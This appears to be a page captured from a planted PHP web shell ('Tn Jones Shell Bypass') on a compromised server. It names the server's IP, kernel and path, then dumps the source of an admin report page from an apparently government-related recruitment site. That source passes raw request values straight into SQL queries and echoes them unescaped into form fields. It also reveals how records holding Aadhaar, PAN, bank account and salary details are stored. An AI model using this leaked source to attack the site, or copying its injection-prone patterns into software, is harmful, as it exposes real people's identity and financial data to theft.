Tn Jones Shell Bypass
:
3.143.24.92
:
160.187.54.56 / upgov.net
:
Linux 160-187-54-56.cprapid.com 4.18.0-553.22.1.lve.1.el7h.x86_64 #1 SMP Tue Oct 8 14:36:03 UTC 2024 x86_64
:
/
home
/
upgov
/
www
/
cenreport
/
pages
/
Upload File:
files >> /home/upgov/www/cenreport/pages/tables9.php
<?php include("../connection.php"); session_start(); if (!isset($_SESSION['User']) || ($_SESSION['password'] == '')) { header("location:..index.php"); exit(); } if(isset($_SESSION['User'])) { $name=$_SESSION['User']; } $user_query = mysql_query("select * from cen_login where User ='$name'")or die(mysql_error()); $user_row = mysql_fetch_array($user_query); $username = $user_row['User']; ?> <!DOCTYPE html> <html lang="en"> <head> <meta charset="utf-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1"> <meta name="description" content=""> <meta name="author" content=""> <title>REPORT</title> <!-- Bootstrap Core CSS --> <link href="../bower_components/bootstrap/dist/css/bootstrap.min.css" rel="stylesheet"> <!-- MetisMenu CSS --> <link href="../bower_components/metisMenu/dist/metisMenu.min.css" rel="stylesheet"> <!-- DataTables CSS --> <link href="../bower_components/datatables-plugins/integration/bootstrap/3/dataTables.bootstrap.css" rel="stylesheet"> <!-- DataTables Responsive CSS --> <link href="../bower_components/datatables-responsive/css/dataTables.responsive.css" rel="stylesheet"> <!-- Custom CSS --> <link href="../dist/css/sb-admin-2.css" rel="stylesheet"> <!-- Custom Fonts --> <link href="../bower_components/font-awesome/css/font-awesome.min.css" rel="stylesheet" type="text/css"> <!--[if lt IE 9]> <script src="https://oss.maxcdn.com/libs/html5shiv/3.7.0/html5shiv.js"></script> <script src="https://oss.maxcdn.com/libs/respond.js/1.4.2/respond.min.js"></script> <![endif]--> <link rel="stylesheet" type="text/css" href="css/style.css" /> </head> <body> <div id="wrapper"> <!-- Navigation --> <nav class="navbar navbar-default navbar-static-top" role="navigation" style="margin-bottom: 0"> <div class="navbar-header"> <button type="button" class="navbar-toggle" data-toggle="collapse" data-target=".navbar-collapse"> <span class="sr-only">Toggle navigation</span> <span class="icon-bar"></span> <span class="icon-bar"></span> <span class="icon-bar"></span> </button> <a class="navbar-brand" href="#"><font size='+2' color="Maroon"><b>DASHBOARD</b></font></a> </div> <!-- /.navbar-header --> <ul class="nav navbar-top-links navbar-right"> <li class="dropdown"> <ul class="nav" id="side-menu"> <li> <a href="report.php"><i class="fa fa-dashboard fa-fw"></i> <b>Centralised</b></a> </li> <li> <a href="report2.php"><i class="fa fa-table fa-fw"></i><b>Candidate Registartion</b></a> </li> <li> <a href="report4.php"><i class="fa fa-table fa-fw"></i> <b>Download Excel</b></a> </li> <li> <a href="report3.php"><i class="fa fa-table fa-fw"></i><b>Forms</b></a> </li> <li> <a href="report5.php"><i class="fa fa-table fa-fw"></i> <b>Old Report pamel</b></a> </li> <li> <a href="logout.php"><i class="fa fa-sign-out fa-fw"></i> <b>Logout</b></a> </li> <!-- <li> <a href=""><i class="fa fa-files-o fa-fw"></i><span class="fa arrow"></span></a> </li>--> </ul> <!-- /.dropdown-user --> </li> <!-- /.dropdown --> </ul> <!-- /.navbar-top-links --> <!-- /.navbar-static-side --> </nav> <div class="col-lg-12"> <form name="frm_image" method="post"> <?php $w=$_REQUEST["t1"]; $w2=$_REQUEST["t2"]; $w3=$_REQUEST["t3"]; $w4=$_REQUEST["t4"]; ?> <center> <table> <td><font color="black"><b>ACCOUNT NO</b></font><br> <input type='text' name="t3" style="height:32px;width:250px;" value="<?php echo $w3; ?>"/> </td> <td><font color="black"><b>REG_ID</b></font><br><input type="text" name="t2" value="<?php echo $w2; ?>" style="font-weight:bold;height:30px;width:200px;" /> </td> <td><font color="black"><b>NAME</b></font><br><input type="text" name="t4" value="<?php echo $w4; ?>" style="font-weight:bold;height:30px;width:200px;" /> </td> <td> <br><input type="submit" value="Search" style="font-weight:bold;height:30px;width:80px;background:#2A5CAA;color:#FFF;" /></td> <td> <br><a href="http://cenreport.upgov.net/pages/report.php"><input type="button" value="Back" style="text-align:center;font-weight:bold;height:30px;width:80px;background:#2A5CAA;color:#FFF;" /></a></td> </center></table> <!-- /.row --> <?php include("../connection1.php"); //include of db config file include ('paginate.php'); //include of paginat page $per_page = 5; // number of results to show per page $result = mysql_query("SELECT * FROM Nmsa where Reg_id like '$w2%' AND Account_no like '$w3%' AND Name like '$w4%' order by created_date DESC"); $total_results = mysql_num_rows($result); $total_pages = ceil($total_results / $per_page);//total pages we going to have //-------------if page is setcheck------------------// if (isset($_GET['page'])) { $show_page = $_GET['page']; //it will telles the current page if ($show_page > 0 && $show_page <= $total_pages) { $start = ($show_page - 1) * $per_page; $end = $start + $per_page; } else { // error - show first set of results $start = 0; $end = $per_page; } } else { // if page isn't set, show first set of results $start = 0; $end = $per_page; } // display pagination $page = intval($_GET['page']); $tpages=$total_pages; if ($page <= 0) $page = 1; ?> <div class="row"> <div class="col-lg-12"> <div class="panel panel-default"> <div class="panel-heading"> <b> NMSA EMPLOYEE LIST</b> </div> <?php $reload = $_SERVER['PHP_SELF'] . "?tpages=" . $tpages; echo "<div class='panel-body'>"; echo "<div class='table-responsive'>"; echo " <li align='left'> <a href='nmrc_excel.php'><i class='fa fa-edit fa-fw'></i>Excel</a> </li>"; // display data in table echo "<table class='table table-striped table-bordered table-hover' style='font-size:12px;'>"; echo " <thead> <tr> <th>S.No</th><th>Photograph</th> <th>Reg_id</th><th>Department</th><th>Scheme</th><th>Postname</th><th>District</th><th>Sub_location</th> <th>Name</th> <th>FatherName</th><th>marital_status</th><th>Category</th> <th>Gender</th><th>Dob</th><th>Totalage</th><th>Address</th><th>Add_dist</th> <th>Email</th><th>Mobile1</th><th>Mobile2</th><th>Highschoolroll</th><th>Highschool</th><th>High_sub</th><th>High_board</th> <th>High_year</th> <th>High_total</th> <th>High_mo</th><th>High_per</th><th>Inter</th> <th>Inter_sub</th><th>Inter_board</th> <th>Inter_year</th> <th>Inter_total</th> <th>Inter_mo</th><th>Inter_per</th> <th>Ug</th><th>Ug_sub</th><th>Ug_board</th> <th>Ug_year</th><th>Ug_total</th><th>Ug_mo</th><th>Ug_per</th> <th>Pg</th><th>Pg_sub</th><th>Pg_board</th><th>Pg_year</th> <th>Pg_total</th> <th>Pg_mo</th><th>Pg_per</th><th>Computercourse</th> <th>Duration</th><th>Companyname</th> <th>C_Post</th><th>Tot_exp</th><th>Idproof</th> <th>Addressproof</th><th>highupload</th> <th>interupload</th><th>uguplaod</th><th>pguplaod</th> <th>computerupload</th><th>expupload</th><th>castupload</th><th>created_date</th> <th>Aadharcard</th><th>pancard</th><th>handicap</th><th>handiupload</th> <th>status</th> <th>Reg_id</th><th>TSN</th><th>counc_date</th> <th>Join_date</th><th>Resign_date</th> <th>Reason_date</th><th>Bank_name</th><th>Account_no</th><th>IFSC</th> <th>Branch</th><th>UAN</th> <th>Member_Id</th><th>EPF_No</th> <th>EPF_Date</th><th>ESI_No</th><th>ESI_Date</th><th>DD_No</th> <th>Sec_recpt_no</th><th>Basic_salary</th><th>Bank Passbook Upload</th> </tr> </thead>"; // loop through results of database query, displaying them in the table $count1=0; for ($i = $start; $i < $end; $i++) { $count1=$i+1; // make sure that PHP doesn't try to show results that don't exist if ($i == $total_results) { break; } // echo out the contents of each row into a table echo " <tbody>"; echo "<tr " . $cls . " class='odd gradeX'>"; ?> <td style='padding: 30px 0;text-align: center;'><?php echo $count1;?></td> <td ><a href='http://rama.upgov.net/pages/<?php echo mysql_result($result, $i, 'Pic');?>'><img src='http://rama.upgov.net/pages/<?php echo mysql_result($result, $i, 'Pic');?>'></a></td> <td style='padding: 30px 0;text-align: center;'><?php echo mysql_result($result, $i, 'Reg_id');?></td> <td style='padding: 30px 0;text-align: center;'><?php echo mysql_result($result, $i, 'Department');?></td> <td style='padding: 30px 0;text-align: center;'><?php echo mysql_result($result, $i, 'Scheme');?></td> <td style='padding: 30px 0;text-align: center;'><?php echo mysql_result($result, $i, 'Postname');?></td> <td style='padding: 30px 0;text-align: center;'><?php echo mysql_result($result, $i, 'District');?></td> <td style='padding: 30px 0;text-align: center;'><?php echo mysql_result($result, $i, 'Sub_location');?></td> <td style='padding: 30px 0;text-align: center;'><?php echo mysql_result($result, $i, 'Name')?></td> <td style='padding: 30px 0;text-align: center;'><?php echo mysql_result($result, $i, 'FatherName')?></td> <td style='padding: 30px 0;text-align: center;'><?php echo mysql_result($result, $i, 'marital_status');?></td> <td style='padding: 30px 0;text-align: center;'><?php echo mysql_result($result, $i, 'Category')?></td> <td style='padding: 30px 0;text-align: center;'><?php echo mysql_result($result, $i, 'Gender');?></td> <td style='padding: 30px 0;text-align: center;'><?php echo mysql_result($result, $i, 'Dob') ;?></td> <td style='padding: 30px 0;text-align: center;'><?php echo mysql_result($result, $i, 'Totalage');?></td> <td style='padding: 30px 0;text-align: center;'><?php echo mysql_result($result, $i, 'Address');?></td> <td style='padding: 30px 0;text-align: center;'><?php echo mysql_result($result, $i, 'Add_dist');?></td> <td style='padding: 30px 0;text-align: center;'><?php echo mysql_result($result, $i, 'Email');?></td> <td style='padding: 30px 0;text-align: center;'><?php echo mysql_result($result, $i, 'Mobile1');?></td> <td style='padding: 30px 0;text-align: center;'><?php echo mysql_result($result, $i, 'Mobile2');?></td> <td style='padding: 30px 0;text-align: center;'><?php echo mysql_result($result, $i, 'Highschoolroll');?></td> <td style='padding: 30px 0;text-align: center;'><?php echo mysql_result($result, $i, 'Highschool');?></td> <td style='padding: 30px 0;text-align: center;'><?php echo mysql_result($result, $i, 'High_sub');?></td> <td style='padding: 30px 0;text-align: center;'><?php echo mysql_result($result, $i, 'High_board');?></td> <td style='padding: 30px 0;text-align: center;'><?php echo mysql_result($result, $i, 'High_year');?></td> <td style='padding: 30px 0;text-align: center;'><?php echo mysql_result($result, $i, 'High_total');?></td> <td style='padding: 30px 0;text-align: center;'><?php echo mysql_result($result, $i, 'High_mo');?></td> <td style='padding: 30px 0;text-align: center;'><?php echo mysql_result($result, $i, 'High_per');?></td> <td style='padding: 30px 0;text-align: center;'><?php echo mysql_result($result, $i, 'Inter');?></td> <td style='padding: 30px 0;text-align: center;'><?php echo mysql_result($result, $i, 'Inter_sub');?></td> <td style='padding: 30px 0;text-align: center;'><?php echo mysql_result($result, $i, 'Inter_board');?></td> <td style='padding: 30px 0;text-align: center;'><?php echo mysql_result($result, $i, 'Inter_year');?></td> <td style='padding: 30px 0;text-align: center;'><?php echo mysql_result($result, $i, 'Inter_total');?></td> <td style='padding: 30px 0;text-align: center;'><?php echo mysql_result($result, $i, 'Inter_mo');?></td> <td style='padding: 30px 0;text-align: center;'><?php echo mysql_result($result, $i, 'Inter_per');?></td> <td style='padding: 30px 0;text-align: center;'><?php echo mysql_result($result, $i, 'Ug');?></td> <td style='padding: 30px 0;text-align: center;'><?php echo mysql_result($result, $i, 'Ug_sub');?></td> <td style='padding: 30px 0;text-align: center;'><?php echo mysql_result($result, $i, 'Ug_board');?></td> <td style='padding: 30px 0;text-align: center;'><?php echo mysql_result($result, $i, 'Ug_year');?></td> <td style='padding: 30px 0;text-align: center;'><?php echo mysql_result($result, $i, 'Ug_total');?></td> <td style='padding: 30px 0;text-align: center;'><?php echo mysql_result($result, $i, 'Ug_mo');?></td> <td style='padding: 30px 0;text-align: center;'><?php echo mysql_result($result, $i, 'Ug_per');?></td> <td style='padding: 30px 0;text-align: center;'><?php echo mysql_result($result, $i, 'Pg');?></td> <td style='padding: 30px 0;text-align: center;'><?php echo mysql_result($result, $i, 'Pg_sub');?></td> <td style='padding: 30px 0;text-align: center;'><?php echo mysql_result($result, $i, 'Pg_board');?></td> <td style='padding: 30px 0;text-align: center;'><?php echo mysql_result($result, $i, 'Pg_year');?></td> <td style='padding: 30px 0;text-align: center;'><?php echo mysql_result($result, $i, 'Pg_total');?></td> <td style='padding: 30px 0;text-align: center;'><?php echo mysql_result($result, $i, 'Pg_mo');?></td> <td style='padding: 30px 0;text-align: center;'><?php echo mysql_result($result, $i, 'Pg_per');?></td> <td style='padding: 30px 0;text-align: center;'><?php echo mysql_result($result, $i, 'Computercourse');?></td> <td style='padding: 30px 0;text-align: center;'><?php echo mysql_result($result, $i, 'Duration');?></td> <td style='padding: 30px 0;text-align: center;'><?php echo mysql_result($result, $i, 'Companyname');?></td> <td style='padding: 30px 0;text-align: center;'><?php echo mysql_result($result, $i, 'C_Post');?></td> <td style='padding: 30px 0;text-align: center;'><?php echo mysql_result($result, $i, 'Tot_exp');?></td> <td style='padding: 30px 0;text-align: center;'><a target='_blank' href='http://rama.upgov.net/pages/<?php echo mysql_result($result, $i, 'Idproof')?>'><?php echo mysql_result($result, $i, 'Idproof');?></a></td> <td style='padding: 30px 0;text-align: center;'><a target='_blank' href='http://rama.upgov.net/pages/<?php echo mysql_result($result, $i, 'Addressproof');?>'><?php echo mysql_result($result, $i, 'Addressproof');?></a></td> <td style='padding: 30px 0;text-align: center;'><a target='_blank' href='http://rama.upgov.net/pages/<?php echo mysql_result($result, $i, 'highupload');?>'><?php echo mysql_result($result, $i, 'highupload');?></a></td> <td style='padding: 30px 0;text-align: center;'><a target='_blank' href='http://rama.upgov.net/pages/<?php echo mysql_result($result, $i, 'interupload');?>'><?php echo mysql_result($result, $i, 'interupload');?></a></td> <td style='padding: 30px 0;text-align: center;'><a target='_blank' href='http://rama.upgov.net/pages/<?php echo mysql_result($result, $i, 'uguplaod');?>'><?php echo mysql_result($result, $i, 'uguplaod');?></a></td> <td style='padding: 30px 0;text-align: center;'><a target='_blank' href='http://rama.upgov.net/pages/<?php echo mysql_result($result, $i, 'pguplaod');?>'><?php echo mysql_result($result, $i, 'pguplaod');?></a></td> <td style='padding: 30px 0;text-align: center;'><a target='_blank' href='http://rama.upgov.net/pages/<?php echo mysql_result($result, $i, 'computerupload');?>'><?php echo mysql_result($result, $i, 'computerupload');?></a></td> <td style='padding: 30px 0;text-align: center;'><a target='_blank' href='http://rama.upgov.net/pages/<?php echo mysql_result($result, $i, 'expupload');?>'><?php echo mysql_result($result, $i, 'expupload');?></a></td> <td style='padding: 30px 0;text-align: center;'><a target='_blank' href='http://rama.upgov.net/pages/<?php echo mysql_result($result, $i, 'castupload');?>'><?php echo mysql_result($result, $i, 'castupload');?></a></td> <td style='padding: 30px 0;text-align: center;'><?php echo mysql_result($result, $i, 'created_date');?></td> <td style='padding: 30px 0;text-align: center;'><?php echo mysql_result($result, $i, 'Aadharcard');?></td> <td style='padding: 30px 0;text-align: center;'><?php echo mysql_result($result, $i, 'pancard');?></td> <td style='padding: 30px 0;text-align: center;'><?php echo mysql_result($result, $i, 'handicap');?></td> <td style='padding: 30px 0;text-align: center;'><a target='_blank' href='http://rama.upgov.net/pages/<?php echo mysql_result($result, $i, 'handiupload');?>'><?php echo mysql_result($result, $i, 'handiupload');?></a></td> <td style='padding: 30px 0;text-align: center;'><?php echo mysql_result($result, $i, 'status');?></td> <td style='padding: 30px 0;text-align: center;'><?php echo mysql_result($result, $i, 'Reg_id');?></td> <td style='padding: 30px 0;text-align: center;'><?php echo mysql_result($result, $i, 'TSN');?></td> <td style='padding: 30px 0;text-align: center;'><?php echo mysql_result($result, $i, 'counc_date');?></td> <td style='padding: 30px 0;text-align: center;'><?php echo mysql_result($result, $i, 'Join_date');?></td> <td style='padding: 30px 0;text-align: center;'><?php echo mysql_result($result, $i, 'Resign_date');?></td> <td style='padding: 30px 0;text-align: center;'><?php echo mysql_result($result, $i, 'Reason_date');?></td> <td style='padding: 30px 0;text-align: center;'><?php echo mysql_result($result, $i, 'Bank_name');?></td> <td style='padding: 30px 0;text-align: center;'><?php echo mysql_result($result, $i, 'Account_no');?></td> <td style='padding: 30px 0;text-align: center;'><?php echo mysql_result($result, $i, 'IFSC');?></td> <td style='padding: 30px 0;text-align: center;'><?php echo mysql_result($result, $i, 'Branch');?></td> <td style='padding: 30px 0;text-align: center;'><?php echo mysql_result($result, $i, 'UAN_NO');?></td> <td style='padding: 30px 0;text-align: center;'><?php echo mysql_result($result, $i, 'Member_Id');?></td> <td style='padding: 30px 0;text-align: center;'><?php echo mysql_result($result, $i, 'EPF_NO');?></td> <td style='padding: 30px 0;text-align: center;'><?php echo mysql_result($result, $i, 'EPF_Date');?></td> <td style='padding: 30px 0;text-align: center;'><?php echo mysql_result($result, $i, 'ESI_NO');?></td> <td style='padding: 30px 0;text-align: center;'><?php echo mysql_result($result, $i, 'ESI_Date');?></td> <td style='padding: 30px 0;text-align: center;'><?php echo mysql_result($result, $i, 'DD_No');?></td> <td style='padding: 30px 0;text-align: center;'> <?php echo mysql_result($result, $i, 'Sec_recpt_no');?></td> <td style='padding: 30px 0;text-align: center;'><?php echo mysql_result($result, $i, 'Basic_salary');?></td> <td style='padding: 30px 0;text-align: center;'><a target='_blank' href='http://rama.upgov.net/pages/<?php echo mysql_result($result, $i, 'bankpass');?>'><?php echo mysql_result($result, $i, 'bankpass');?></a></td> </tr> <?php echo " </tbody>"; } // close table> echo "</table>"; echo '<div class="pagination"><ul>'; if ($total_pages > 1) { echo paginate($reload, $show_page, $total_pages); } echo "</ul></div>"; // pagination ?> </div> <!-- /.table-responsive --> </div> <!-- /.panel-body --> </div> <!-- /.panel --> </div> <!-- /.col-lg-12 --> </div> </div> <!-- /#wrapper --> <!-- jQuery --> <script src="../bower_components/jquery/dist/jquery.min.js"></script> <!-- Bootstrap Core JavaScript --> <script src="../bower_components/bootstrap/dist/js/bootstrap.min.js"></script> <!-- Metis Menu Plugin JavaScript --> <script src="../bower_components/metisMenu/dist/metisMenu.min.js"></script> <!-- DataTables JavaScript --> <script src="../bower_components/datatables/media/js/jquery.dataTables.min.js"></script> <script src="../bower_components/datatables-plugins/integration/bootstrap/3/dataTables.bootstrap.min.js"></script> <!-- Custom Theme JavaScript --> <script src="../dist/js/sb-admin-2.js"></script> <!-- Page-Level Demo Scripts - Tables - Use for reference --> <script> $(document).ready(function() { $('#dataTables-example').DataTable({ responsive: true }); }); </script> </body> </html>